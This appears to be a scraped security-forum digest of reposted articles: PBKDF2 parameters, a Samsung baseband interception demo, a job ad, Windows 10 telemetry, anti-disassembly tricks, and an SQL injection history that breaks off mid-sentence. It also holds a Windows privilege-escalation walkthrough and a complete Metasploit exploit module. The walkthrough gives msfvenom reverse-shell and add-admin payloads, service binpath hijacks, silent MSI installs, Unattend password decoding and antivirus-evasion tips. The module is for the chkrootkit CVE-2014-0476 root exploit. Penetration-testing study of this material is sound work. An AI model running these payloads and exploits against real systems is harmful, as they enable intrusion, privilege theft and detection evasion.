Nytro

Parameter choice for PBKDF2 PBKDF2, standardised in RFC 2898 and PKCS#5, is a function for creating a cryptographic key from a password. It is the only such function currently appearing in NIST standards, hence it has seen widespread use. The aim of the function is to create a key in such a way that dictionary attacks (where the attacker just tries a range of possible passwords) are unfeasible. To do this, PBKDF2 applies a pseudorandom function (PRF) to the password many times. This means that an attacker making a guess at the password will also have to apply the function many times to his guess. Additionally, the function can be given a “salt” parameter. The idea of this is to make each key derivation operation unique, so that an attacker cannot guess one password and then look for matches against a large number of derived keys. These properties mean PBKDF2 is used not just to produce a key to be used in a cryptographic protocol, but also to store passwords securely (by storing the derived keys). A developer using PBKDF2 must choose parameter values for the salt, the PRF, and the number of iterations, i.e. the number of times the PRF will be applied to the password when deriving the key. The specification suggests (in section 4.1) that the salt be (or contain) a 64 bit pseudorandom value. This makes collisions (i.e. occasions that two stored passwords use the same salt) unlikely. By the birthday paradox, we would expect a collision after 2^32 passwords, i.e. a little more than 4 billion. The PRF mentioned in the specification is SHA-1, and in many libraries this is the only choice. However, using SHA-256 or SHA-512 has the benefit of significantly increasing the memory requirements, which increases the cost for an attacker wishing to attack use hardware-based password crackers based on GPUs or ASICs. The recommended iteration count in the RFC published in September 2000 was 1000. Computing performance has greatly increased since then. Modern guides such as the OWASP password storage cheat sheet (2015) recommend 10 000 iterations.NIST’s own guide (Appendix A.2.2) recommends that the iteration count be “as high as can be tolerated while still allowing acceptable server performance”. Cracking Stuff What are the consequences of a low iteration count? Imagine we are restricted to using SHA-1 as our PRF, as is the case for example in PKCS#11 up to version v2.20. How long would it take a well-resourced attacker (i.e. with access to GPUs) to break an 8-character password? First we have to estimate how much entropy or “randomness” there is in an 8-character password. An excellent paper by Kelley et al. from IEEE Security and Privacy 2012 found that when users are forced to choose a password following the “Comprehensive8” policy, “Password must have at least 8 characters including an uppercase and lowercase letter, a symbol, and a digit. It may not contain a dictionary word.”, the result is roughly 33 bits of entropy. If, however, the password is a perfectly random combination of uppercase and lowercase letters, numbers and the 30 symbols on a US keyboard, we would expect 52 bits of entropy. Interestingly, the same result can be obtained by choosing 4 random words from the Diceware list. Second, we need to know how fast GPUs can calculate PBKDF2. An article from April 2013 reports a rate of 3 million PBKDF2 guesses per second on a typical GPU setup. This includes calculating AES once for each guess (to see if the right key has been derived to decrypt a master key file), and it’s now November 2015, so suppose conservatively we can apply Moore’s law almost once since then (whether one can apply Moore’s “law” to GPUs is doubtful), giving a very rough rule-of-thumb ability of 5 million guesses per second on typical GPU hardware. The table below shows how long an attacker would take to cover the whole password space of a single salted hashed password. [TABLE] [TR] [TH]Password complexity[/TH] [TH]Entropy estimate (bits)[/TH] [TH]1000 iterations[/TH] [TH]10000 iterations[/TH] [/TR] [TR] [TD]Comprehensive8[/TD] [TD]33[/TD] [TD]4 hours 46 minutes[/TD] [TD]47 hours[/TD] [/TR] [TR] [TD]8 random lowercase letters[/TD] [TD]37[/TD] [TD]12 hours[/TD] [TD]5 days[/TD] [/TR] [TR] [TD]8 random letters[/TD] [TD]45[/TD] [TD]123 days[/TD] [TD]3 years 5 months[/TD] [/TR] [TR] [TD]8 letters + numbers + punctuation OR 4 random Diceware words[/TD] [TD]52[/TD] [TD]325 years[/TD] [TD]3250 years[/TD] [/TR] [/TABLE] Conclusions If you have to use PBKDF2, you should: use a unique 64-bit salt for each password. rather than SHA-1, use SHA-512 or if not SHA-256 if you can. use an iteration count of at least 10000, more if you can do it “while still allowing acceptable server performance”. In a future blog post, we’ll cover other password hashing functions like bcrypt, scrypt, and the winner of the recent password hashing competition, ARGON-2. Sursa: https://cryptosense.com/parameter-choice-for-pbkdf2/

Samsung S6 calls open to man-in-the-middle base station snooping Research duo pop baseband chip in preliminary demo-hack 12 Nov 2015 at 05:56, Darren Pauli PacSec Modern Samsung devices including the S6, S6 Edge and Note 4 can have phone calls intercepted using malicious base stations, according to initial research findings from two researchers. Daniel Komaromy and Nico Golde demonstrated the attacks on Samsung's 'Shannon' line of baseband chips today at the Mobile Pwn2Own competition at PacSec, Toyko. Full exploitation details of their research has not been publicly detailed, but it has been disclosed to Samsung. Their cheap man-in-the-middle attack requires an OpenBTS base station to be established and located near target handsets. Handsets will automatically connect to the bogus station. The malicious base station then pushes firmware to the phone's baseband processor (the chip that handles voice calls, and which isn't directly accessible to end users). The firmware patch pushes phone calls through the bogus base station, which redirects them to a proxy that records them and passes them on to the intended recipient. Komaromy says the full impact of the attack along with any mitigating factors will be known once seasoned researchers examine their work. "Our example of modifying the baseband to hijack calls is just an example," Komaromy told Vulture South. "The idea with hijacking would be that you can redirect calls to a proxy (like a SIP proxy) and that way you can man-in-the-middle the call. "So that means the caller sees her original call connected - but it can be recorded in the proxy [which is how] it's like a wiretap implant." Nico Golde (l) and Daniel Komaromy at Pwn2Own today. ?????? Drago Ruiu The attack was tested on a new Samsung Galaxy S6 Edge which PacSec organiser Dragos Ruiu took out of its box and updated before handing it over. "I turned it on next to their radio and then dialled myself," Ruiu says of the demonstration held deep below the Tokyo conference to avoid pwning delegate phones. "And instead of ringing on my phone it rang on theirs." The hacker duo now own the phone as a prize and will in March travel to Canada for CanSecWest on a ski trip along with their spouses. They will present further technical detail of the attack at that lauded conference. It comes as Chinese researcher Guang Gong popped the latest version of Google Chrome at the contest. As El Reg reported, the attack likely affects all Android phones and allows the devices to be completely compromised through a single exploit that requires no interaction beyond visiting a crafted web site. Ruiu is offering ski trips and vendors may cough up bug bounties in exchange for the winning hacks. Last year hackers hosed popular phones for shares in $425,000 in cash rewards, but security sponsors Google, Apple, Microsoft and Hewlett Packard's Zero Day Initiative pulled out. ® Sursa: Samsung S6 calls open to man-in-the-middle base station snooping • The Register

[h=1]Senior IT Auditor[/h] What are we looking for? Senior IT Auditor for our Advisory team. Candidate profile: • Conduct IT Audits in accordance with IT audit methodology and other relevant standards; • Strong ability to articulate business risks of deficiencies identified to client personnel; • Identify and communicate findings to client personnel; • Recognize performance improvement opportunities for clients. Requirements: • Bachelor’s degree in an IT related field • Minimum 2 years of experience in IT audits • Ability to identify risks and controls in various IT systems (applications, computer networks, operating systems, databases) • Ability to test the IT controls (entity level, IT general controls, application level) and to identify compensating controls • Basic knowledge of various IT environments • Very good technical and business English • Ability to identify and resolve IT related business issues and provide innovative solutions both for IT and business • Work effectively either individually or as a member of a multi-skilled team • Professional discipline, accuracy, reliability and excellent analytical skills • Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation • Certifications such as CISA, CISSP, CRISC or ISO27001 will be considered a plus Our Offer: • A competitive salary and benefits package • The chance to develop a rewarding professional path and work on challenging assignments • Support for professional qualifications and personal development through a strong mentoring program • Work in a friendly team of security professionals who enjoy sharing their experience with colleagues • The opportunity to participate in a wide variety of technical projects and client environments • Flexible working program We are looking forward to receiving your CV and letter of motivation, in English, until December, 15th 2015. Shortlisted candidates will be invited to interview. Link: http://www.bestjobs.ro/locuri-de-munca-senior-it-auditor/228141/2 Note: 1. Job-ul nu este legat de security 2. Este adresat persoanelor care au mai facut asa ceva Info (cred): https://en.wikipedia.org/wiki/Information_technology_audit Daca aveti nevoie de mai multe informatii imi puteti da PM. Daca vreti sa fie vazut rapid si de catre cine trebuie CV-ul imi puteti da PM.

[h=1]Black Hat USA 2015 - Red Vs Blue Modern Active Directory Attacks, Detection, And Protection[/h]

O sponsoizare de la Starbucks, Gloria Jeans sau mai stiu eu ce, ar prinde bine. L-ar aduce pana si pe @aelius acolo, chiar de ar fi in Germania.

OpenVPN for paranoids Tue 17 November 2015 By Victor Dorneanu Continuing my admin series this time I'd like to setup a VPN using OpenVPN as user-based VPN solution. Unlike IPSec solutions which require IPSec on both (server and client) sides, securing the VPN tunnel by OpenSSL is a more preferable option.In this post I'll try to show which steps have to be taken in order to: secure the communication channel use up-to-date (and secure!) TLS configurations prevent information leaks when the VPN tunnel is down At least for the last one some additional steps are required to route your traffic only through the VPN tunnel. As a client you don't want your connection to be "downgraded" (in terms of security) without even realizing it. That's why you might want to restrict your routes and allow outbound connection only through the (virtual) interface dedicated to the VPN. How this is done and which methods exist, is covered later on. Articol complet: OpenVPN for paranoids - blog.dornea.nu

Posted on November 24, 2015 by Jonathan Common Windows Privilege Escalation Vectors Imagine this scenario: You’ve gotten a Meterpreter session on a machine (HIGH FIVE!), and you opt for running getsystem in an attempt to escalate your privileges… but what that proves unsuccessful? Should you throw in the towel? Only if you’re a quitter… but you’re not, are you? You’re a champion!!! In this post I will walk us through common privilege escalation techniques on Windows, demonstrating how to “manually” accomplish each task as well as talk about any related Metasploit modules. While most techniques are easier to exploit when escalating from Local Administrator to SYSTEM, improperly configured machines can certainly allow escalation from unprivileged accounts in the right circumstances. Note: In this post, we will focus on escalation techniques that do not rely on kernel exploits such as KiTrap0d (which just so happens to be one of four methods attempted by Meterpreter’s getsystem.) Trusted Service Paths This vulnerability deals with how Windows interprets spaces in a file path for a service binary. Given that these services often run as SYSTEM, there is an opportunity to escalate our privileges if we can exploit this behavior. For example, consider the following file path: C:\Program Files\Some Folder\Service.exe For each space in the above file path, Windows will attempt to look for and execute programs with a name that matches the word in front of space. The operating system will try all possibilities throughout the entire length of the file path until it finds a match. Using the example above, Windows would try to locate and execute programs in the following order: C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder\Service.exeNote: This behavior happens when a developer fails to enclose the file path in quotes. File paths that are properly quoted are treated as absolute and therefore mitigate this vulnerability. As a result, you may see this vulnerability referred to as “Unquoted Service Paths.” If we were to drop a properly-named malicious executable in an affected folder, upon a restart of the service, we could have our malicious program run as SYSTEM (in a majority of cases). However, prior to dropping an executable, we would have to ensure that we had the necessary privileges to the target folder (organizations with least privilege properly implemented would prevent us from dropping an executable at the root of the drive). Let’s go ahead and step through the process of identifying and exploiting this vulnerability… To start, we can utilize the following one-line Windows Management Instrumentation (WMI) query, written by Danial Compton (@commonexploits), to list all unquoted service paths (minus built-in Windows services) on our compromised machine, GREED: wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ As you can see, we have a hit! The path for PFNet’s service binary is unquoted and contains spaces. If the stars align, we will also have the necessary folder permissions. Assuming we’ve already checked our permissions on the root of the drive, let’s use the built-in Windows tool, Integrity Control Access Control Lists (icacls), to view the permissions of the other affected folder in the path, Privacyware icacls "C:\Program Files (x86)\Privacyware" Notice the first line: BUILTIN\Users:(OI)(CI)(M), which lists the permissions for unprivileged users. The (M) stands for Modify, which grants us, as an unprivileged user, the ability to read, write and delete files and subfolders within this directory. WHAT LUCK! We are now free to create and drop a malicious executable called Privatefirewall.exe… let’s begin! Note: We would be able to accomplish the same task if we had Write (W) permissions to the Privacyware folder. For a more information on Windows permissions, check out the following MSDN link: File and Folder Permissions. When creating an executable with MSFVenom, you may wish to have your payload simply add a user to the Local Administrators group (windows/adduser) or send you a reverse Meterpreter shell running as SYSTEM (as demonstrated below). Other options are certainly possible! msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe Now that our malicious executable is in place, let’s try to stop and then restart the PFNet service in order to kick off our shell. To do this, we can utilize the built-in Service Control (sc) tool: sc stop PFNet sc start PFNet LAME! As you can see above, while we have Modify permissions for certain folders within the service path, we don’t actually have permissions to interact with the PFNet service itself. In this scenario, we can wait for someone to restart the GREED machine or force a restart ourselves (stealthy the latter is not). Upon a restart of GREED, Windows locates and executes our Privatefirewall binary, sending us a shell with SYSTEM privileges. The world (or, at least, GREED) is all ours at this point! Metasploit Module: exploit/windows/local/trusted_service_path This module only requires that you link it to an existing Meterpreter session before running: A review of the source code reveals that the module uses some regular expression magic to filter out any paths that are quoted or have no spaces in the path to create a list of vulnerable services. The module then attempts to exploit the first vulnerable service on the list by dropping a malicious service executable into the affected folder. The vulnerable service is then restarted, and afterwards, the module takes care of removing the malicious executable. Note: I didn’t see anywhere in the module’s code that a check is performed as to whether we have appropriate access to the target directory prior to attempting to drop the executable. This seems a little odd to me… Vulnerable Services When discussing exploitation of Vulnerable Services, there are two main ideas that one can be referring to exploiting: Service Binaries Windows Services The former is very similar to what we did with Trusted Service Paths. Whereas Trusted Service Paths exploits odd Windows file path interpretation in combination with folder permissions along the service path, Vulnerable Service Executables takes advantage of file/folder permissions pertaining to the actual executable itself. If the correct permissions are in place, we can simply replace the service executable with a malicious one of our own. Using Privacy Firewall as an example, we’d place an executable named pfsvc.exe into the “Privatefirewall 7.0” folder. VIOLA! The latter refers to the actual Windows Service and the ability to modify it’s properties. These Services run in the background and are controlled by the Operating System through the Service Control Manager (SCM), which issues commands to and receives updates from all Windows Services. If we can modify a Service’s binary path (binpath) property, upon a restart of the service, we can have the Service issue a command as SYSTEM on our behalf. Let’s take a look… The easiest way to determine which Windows Services have vulnerable privileges is to utilize the AccessChk tool, which is part of the SysInternals Suite. This group of tools was written for Microsoft by Mark Russinovich to allow for advanced querying, managing and troubleshooting of systems and applications. While it’s always a good idea to limit the amount of items that you allow to touch disk during a pentesting engagement, due to risk of anti-virus detection (among other concerns), since AccessChk is an official and well-known Microsoft tool, the chances of flagging any protective mechanisms on the machine are slim. Once we have AccessChk downloaded on our target machine, GREED, we can run the following command to determine which Services can be modified by any authenticated user (regardless of privilege level): accesschk.exe -uwcqv "Authenticated Users" * /accepteula Well, what do we have here? PFNet shows it’s face once more! SERVICE_ALL_ACCESSmeans we have full control over modifying the properties of the PFNet Service. In most scenarios an unprivileged account should not have this type of control over a Windows Service, and often times these types of vulnerabilities occur due to misconfiguration by an Administrator or even the third-party developer (believe it or not, Windows XP SP0 actually had several built-in Services with this vulnerability *facepalm*). Note: The PFNet Service was intentionally modified to be insecure for the purposes of this particular demonstration. This explains why we were unable to successfully control the service during the Trusted Service Paths walk-through. Let’s utilize the Service Control (sc) utility to view the configuration properties of the PFNet Service: sc qc PFNet Notice that the BINARY_PATH_NAME value is set to point to pfsvc.exe, which we know is is the associated service binary. Changing this value to a command to add a user and restarting the service will execute this command as SYSTEM (confirmed by validatingSERVICE_START_NAME is set to LocalSystem). We can repeat the process one more time to add our new user to the Local Administrator group: sc config PFNET binpath= "net user rottenadmin P@ssword123! /add" sc stop PFNET sc start PFNET sc config PFNET binpath= "net localgroup Administrators rottenadmin /add" sc stop PFNET sc start PFNET YIKES! The sc utility throws an error each time we start the service with one of our malicious commands in the binpath. This is because the net user and net localgroup commands do not point to the service binary and therefore the SCM cannot communicate with the service. Never fear, however, as the error is thrown only afterissuing our malicious commands: Note: I’d recommend setting the binpath property to point to the original service binary and having the service successfully started/running once you’ve completed your privilege escalation. This will allow normal Service behavior to resume and reduce drawing unwanted attention. Now that we have an established account on GREED with Administrator privileges, it would be rather simple to escalate to SYSTEM in the future if needed (bit o’ Mimikatz, anyone?). Metasploit Module: exploit/windows/local/service_permissions This module only requires that you link it to an existing Meterpreter session before running: This module tries two methods in an attempt to escalate to SYSTEM. First, if the Meterpreter session is currently running under Administrator privileges, the module will aim to create and run a new service. If the current account privileges do not allow for service creation, the module will then seek out to determine if weak folder or file permissions will allow for hijacking existing services. When creating new services or hijacking existing ones, the module creates an executable, which has a randomly-generated filename as well as installation folder path. Enabling the AGGRESSIVE option on this module will exploit every vulnerable service on the target host. With the option disabled, the module stops at the first successful escalation attempt. AlwaysInstallElevated AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions. However, granting users this ability is a security concern because For this to occur, there are two registry entries that have to be set to the value of “1” on the machine: [HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001The easiest way to check the values of these two registry entries is to utilize the built-in command line tool, reg query: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated Note: If you happen to get an error message similar to: The system was unable to find the specified registry key or value, it may be that a Group Policy setting for AlwaysInstallElevated was never defined, and therefore an associated registry entry doesn’t exist. Now that we know AlwaysInstallElevated is enabled for both the local machine and the current user, we can proceed to utilize MSFVenom to generate an MSI file that, when executed on the victim machine, will add a user to the Local Administrators group: msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o rotten.msiOnce you have our newly created MSI file loaded on the victim, we can leverage a command-line tool within Windows, Msiexec, to covertly (in the background) run the installation: msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msiThe properties of the switches utilized in the above Msiexec command are below: /quiet = Suppress any messages to the user during installation /qn = No GUI /i = Regular (vs. administrative) installation Once run, we can check to validate that our account was created and added to the Local Administrator Group: Note: MSI files created with MSFVenom as well as with the always_install_elevated module discussed below, will fail during installation. This behavior is intentional and meant to prevent the installation being registered with the operating system. Metasploit Module: exploit/windows/local/always_install_elevated As you can see below, this module simply requires that you link it to an existing session prior to running: There is an advanced setting, called QUIET, that you’ll want to enable in most scenarios. Turning on QUIET acts the same as utilizing the /quiet switch as part of a Msiexec command. This ensures that all messages to the user are suppressed, keeping our activities covert. The module creates an MSI file with a randomly-generated filename and takes care of all cleanup after deployment. Unattended Installs Unattended Installs allow for the deployment of Windows with little-to-no active involvement from an administrator. This solution is ideal in larger organizations where it would be too labor and time-intensive to perform wide-scale deployments manually. If administrators fail to clean up after this process, an EXtensible Markup Language (XML) file called Unattend is left on the local system. This file contains all the configuration settings that were set during the installation process, some of which can include the configuration of local accounts, to include Administrator accounts! While it’s a good idea to search the entire drive, Unattend files are likely to be found within the following folders: C:\Windows\Panther\ C:\Windows\Panther\Unattend\ C:\Windows\System32\ C:\Windows\System32\sysprep\ Note: In addition to Unattend.xml files, be on the lookout for sysprep.xml and sysprep.inf files on the file system. These files can also contain credential information utilizing during deployment of the operating system, allowing us to escalate privileges. Once you’ve located an Unattend file, open it up and search for the <UserAccounts> tag. This section will define the settings for any local accounts (and sometimes even Domain accounts): <UserAccounts> <LocalAccounts> <LocalAccount> <Password> <Value>UEBzc3dvcmQxMjMhUGFzc3dvcmQ=</Value> <PlainText>false</PlainText> </Password> <Description>Local Administrator</Description> <DisplayName>Administrator</DisplayName> <Group>Administrators</Group> <Name>Administrator</Name> </LocalAccount> </LocalAccounts> </UserAccounts> In the snippet of the sample Unattend file above, you can see a local account being created and added to the Administrators group. The administrator chose not to have the password stored in plaintext; however, it is merely obfuscated with Base64. As seen below, we can trivially decode it in Kali with the following: echo "UEBzc3dvcmQxMjMhUGFzc3dvcmQ=" | base64 -d So, our password is “P@ssword123!Password”? Not quite… Microsoft appends “Password” to all passwords within Unattend files before encoding them; therefore, our Local Administrator password is in fact just “P@ssword123!”. Note: Under the <UserAccounts> section, you may also see<AdministratorPassword> tags, which are another way to configure the Local Administrator account. Metasploit Module: post/windows/gather/enum_unattend This module is relatively straightforward. The only action is to assign it to the active Meterpreter session we are interested in: After a review of the source code, it appears that this module will only search for Unattend.xml files, and therefore, may miss stored credentials in related files such as syspref.xml and syspref.inf. On the positive side, this module will search the entire drive in an attempt to located Unattend files. Group Policy Preferences (GPP) Please refer to my August 2015 blog post for a detailed walkthrough of exploiting GPP for privilege escalation: What You Know Bout GPP???. !!! Important Note Regarding Anti-Virus !!! During my testing, MSI and EXE binaries generated by MSFVenom as well as Metasploit Modules were flagged by some Anti-Virus (a/v) software. This is because the executable templates utilized by Metasploit are well-known to a/v vendors. For more information on why templates are flagged and how to evade detection, please see my September 2015 blog post: A/V Ain’t Got Nothing On Me! Utilizing an obfuscation tool such as Veil-Evasion or creating your own executable by “compiling” PowerShell scripts (to add a user to the Administrators group, for example) stand a much better chance of bypassing any deployed a/v solution. Within Metasploit, modules offer an advanced option to substitute custom EXE and MSI binaries. Just be sure to set EXE::Custom or MSI::Custom to point to your binary prior to executing the module. Additional Resources Windows Privilege Escalation Fundamentals This is an amazing resource put together by Ruben Boonen (@FuzzySec) and was indispensable during my preparation for the Offensive Security Certified Professional exam. Ruben touches on escalation techniques not covered in my post, such as searching the registry for credentials as well as exploiting scheduled tasks. Most definitely worth the read… PowerUp PowerUp is a PowerShell tool written by Will Schroeder (@harmj0y) that will query a victim machine in order to identify what privilege escalation vectors are present. With most of the vectors, if the machine is vulnerable, you can then utilize PowerUp for exploitation. Originally written in 2014 as a standalone tool, it has now been integrated into Empire, a post-exploitation, cryptographically-secure PowerShell agent. Sursa: http://toshellandback.com/2015/11/24/ms-priv-esc/

Anti-Disassembly techniques used by malware (a primer) Rahul Nair | 22 Nov 2015 There are chances that malware authors implement some kind of trolling so that a malware analyst has a hard time figuring out code during static analysis (IDA Pro ?). Implementing these cunning asm instruction will not cause any issues to the flow of the program but will confuse static analysis tools such as IDA Pro from interpreting the code correctly. Once upon a time there were 2 kinds of disassembly algorithms -Linear disassembly and flow-oriented disassembly.The former was used in tutorials/ nobody gives a damn is not used that much in disassemblers. What we are concerned about is the latter which is used in IDA Pro and sometime gamed by malware authors- 1.Jump Instructions to a location with constant value This is the most used trick by malware writers/anti-disassembly programs which create jumps into the same location + 1 or 2 bytes. It would lead to interpretation of completely different byte code by the system. For instance the actual jump instance here would take the flow of program to the bytecode mentioned above. Since tools like IDA pro are not that clever(no offense to the creator) it cannot make such judgements and instead interprets the opcode from E8 instead which shows us a bunch of call instructions to some random crappy address, weird decrements and adds. No we can fix this with ease in IDA PRO. Do that by pressing D on the E8 and C key on the 8B Opcode and voila! you get what is actually being interpreted. After playing around more with the C & D key you get the following in IDA which seems legit Now what has happened here is that the the author might have inserted something known as a rogue byte which confuses IDA pro leading to a wrong interpretation of the rest of the opcode.This is a simple technique and if you dont like to see that ugly E8 byte you could NOP it out 2.Jump Instructions to the Same target IDA Pro usually follows this behavior where for a conditional instruction (jnz) it first disassembles the false branch of the conditional instruction and then moves forward to the true part. From a malware POV since both the jz and jnz are present it is similar to an unconditional jump Once IDA pro reaches the jz instruction it would first branch out and interpret the false instruction and move on to jnz where it would do the same.A nice and dirty trick is to insert a rogue byte code and make the disassembler interpret the instructions as a call. If we do the C & D thingy in IDA pro as mentioned in 1. we get the following code 3.Ping-Pong jumps I have no idea what this technique is named as but it involves doing a lot of jumping around using the method mentioned in 1.and maybe even a bit of 2 Let's look at this innocent jump below. This jumps goes back to loc_4012E6+2 which would be the EB opcode. If we ignore the 66 and B8 opcode ,make IDA interpret the rest as code instead we get the following Yay more jumps. Once again ignoring the other E8 byte and considering the rest as code the result is as follows- We can see how incorporating rogue bytes obscures the real function call from being hidden in static analysis. 4.Usage of Function Pointers Instead of a screen shot here is a piece of code mov [ebp+var8],offset sub4211C1 push 4Ah call [ebp+var_8] What happens above is that a function is called via use of a reference to an address. For example for the function call it would get the funciton stringname by the use of some weird bunch of decoding subroutine and save the value in an offset sub4211C1. This would make static analysis really hard since IDA won't recognize it easily. From a static analysis point of view though it dosen't seem to cause massive harm this coupled with other anti-disassembly techniques can lead to annoyance for an analyst. There are a couple more annoying techniques which I will explore in another post such as abusing the return pointer (for fun and profit:P ) ,using your own Structed Exception Handler (SEH) and screwing around with the stack-frame construction in IDA pro. Sursa: Anti-Disassembly techniques used by malware (a primer)

Microsoft Makes Windows 10 Automatic Spying Worse Microsoft MSFT +0.11% has been on a roll lately. Its massive Windows 10 update ‘Threshold 2’ has far more good features than bad ones, the ‘free upgrade’ rules have been improved and even Microsoft’s Black Friday 2015 dealsare surprisingly great. But a new discovery has been made which isn’t good news – at all… Earlier this month Microsoft finally went on record admitting that automatic spying within Windows 10 cannot be stopped. This sparked a lot of outrage and with ‘Threshold 2’ it appeared Microsoft had done a sharp U-turn because the background service at the heart tracking (the ‘Diagnostics Tracking Service’ aka ‘DiagTrack’) appeared to have been removed. Critics celebrated and it was another well deserved pat on the back for Microsoft. Except it turns out Microsoft had just been very sneaky. What Tweakhound discovered and was subsequentlyconfirmed by BetaNews, is Microsoft simply renamed DiagTrack. It is now called the ‘Connected User Experiences and Telemetry Service’ – which is both a) deliberately vague, and misleading (don’t ‘Connected User Experiences’ sound great). Windows 10 prior to the Threshold 2 update shows ‘Diagnostics Tracking Service’. Image credit: Tweakhound Even sneakier is, in being renamed, Microsoft also reset users preferences. Those who dug deep into the Windows 10 registry to disable DiagTrack will find it has been re-enabled now it is called the Connected User Experiences and Telemetry Service. Yes, tracking is back and without any warning and your preferences were irrelevant. The good news is you can disable the Connected User Experiences and Telemetry Service the same way as DiagTrack: Hold down the Windows key and tap the R key In the box that opens type ‘services.msc’ and press the Enter key In the ‘Services (Local)’ section locate ‘Connected User Experiences and Telemetry’ and double-click it In the ‘Service status’ section click ‘Stop’ Under the ‘Startup type’ drop down menu select ‘Disabled’ and then confirm this and close the window by clicking ‘OK’ Note: it is advisable to disable Not delete the service. Deleting it can cause problems Windows 10 prior to the Threshold 2 update shows ‘Connected User Experiences And Telemetry’ which executes the exact same service as DiagTrack. Image credit: Tweakhound So what is Microsoft thinking here? I’ve reached out to the company but, despite recognising my enquiry, it has yet to issue a statement. I’ll update this post when it does. While Microsoft thinks about what to say, I’d say the problem with the DiagTrack rebrand is the company wasn’t thinking. Subtle under the hood changes will always be picked up for such a high profile product. That said such a move is consistent with the negatives in Threshold 2 namely: it resets many user preferences (including basics like your preferred web browser) if they weren’t Microsoft product/services as well as silently deleting third party system monitoring apps like: CPU-Z, speccy, 8gadgetpack, SpyBot, HWMonitor and more. In my opinion it is this kind of overriding desire for control and a disregard for user choices which is harming Windows 10. At its core Windows 10 is a modern and highly capable platform, but it has been buried under ludicrous layers of control. Worst still it has created a two tier customer base where consumers are forced to take updates which businesses can delay, effectively turning everyday users into bug testers for corporations. It all feels unsavoury and unnecessary and (while it could be coincidence) there has been a -users-reluctant-to-switch/'>dramatic slowdown in Windows 10 growth after an explosive beginning. For the first ever Free version of Windows, that’s not great. How can Microsoft reignite the love for Windows 10? I’d say a good start would be to stop doing daft things like this… Sursa: http://www.forbes.com/sites/gordonkelly/2015/11/24/windows-10-automatic-spying-begins-again/

HTTPS e ok (depinde si de tine). HTTP nu e ok. Tor Browser e ok (depinde si de tine). Mozilla cu proxy Tor nu e ok. https://hackertarget.com/tor-exit-node-visualization/

[h=1]Chkrootkit Local Privilege Escalation[/h] ### This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit4 < Msf::Exploit::Local # This could also be Excellent, but since it requires # up to one day to pop a shell, let's set it to Manual instead. Rank = ManualRanking include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Chkrootkit Local Privilege Escalation', 'Description' => %q{ Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privsec. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default. }, 'Author' => [ 'Thomas Stangner', # Original exploit 'Julien "jvoisin" Voisin' # Metasploit module ], 'References' => [ ['CVE', '2014-0476'], ['OSVDB', '107710'], ['EDB', '33899'], ['BID', '67813'], ['CWE', '20'], ['URL', 'http://seclists.org/oss-sec/2014/q2/430'] ], 'DisclosureDate' => 'Jun 04 2014', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'SessionTypes' => ['shell', 'meterpreter'], 'Privileged' => true, 'Stance' => Msf::Exploit::Stance::Passive, 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0, 'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h )) register_options([ OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit']) ]) end def check version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1") if version =~ /chkrootkit version 0\.[1-4]/ Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit print_warning('Rooting depends on the crontab (this could take a while)') write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n") cmd_exec('chmod +x /tmp/update') register_file_for_cleanup('/tmp/update') print_status('Payload written to /tmp/update') print_status('Waiting for chkrootkit to run via cron...') end end Sursa: https://www.exploit-db.com/exploits/38775/

WRITTEN BY JOSEPH COX November 20, 2015 // 08:00 AM EST One of the hackers suspected of being behind the TalkTalk breach, which led to the personal details of at least 150,000 people being stolen, used a vulnerabilitydiscovered two years before he was even born. That method of attack was SQL injection (SQLi), where hackers typically enter malicious commands into forms on a website to make it churn out juicy bits of data. It's been used to steal the personal details of World Health Organization employees,grab data from the Wall Street Journal, and hit the sites of US federal agencies. “It’s the most easy way to hack,” the pseudonymous hacker w0rm, who was responsible for the Wall Street Journal hack, told Motherboard. The attack took only a “few hours.” But, for all its simplicity, as well as its effectiveness at siphoning the digital innards of corporations and governments alike, SQLi is relatively easy to defend against. So why, in 2015, is SQLi still leading to some of the biggest breaches around? SQLi was possibly first documented by Jeff Forristal in the hacker zine Phrack. Back then, Forristal went by the handle rain.forest.puppy, but he's now CTO of mobile security at cybersecurity vendor Bluebox security. “According to Microsoft, what you're about to read is not a problem, so don't worry about doing anything to stop it.” SQL, or Structured Query Language, is a programming language used to manage databases. In essence, it's used when a website needs to call up a piece of information from its database, either to process it or present it to a user. But Forristal had found that typing certain commands would force a server to reveal information stored on it. “People can possibly piggyback SQL commands,” he wrote. In the December 1998 issue of Phrack, Forristal wrote about a series of issues with a version of Microsoft SQL server. When Forristal's fellow researcher told Microsoft of the problems, “their answer was, well, hilarious,” he wrote. “According to them, what you're about to read is not a problem, so don't worry about doing anything to stop it.” Today, over 15 years after it was first publicly disclosed, SQLi repeatedly sits at thenumber one spot of vulnerabilities in the OWASP Top 10 report, which is released every three years by the Open Web Application Security Project (OWASP) Foundation,a non-profit that monitors the threats that websites face. Phrack's current logo. Image: Phrack “SQL injection is always the number one risk. That is 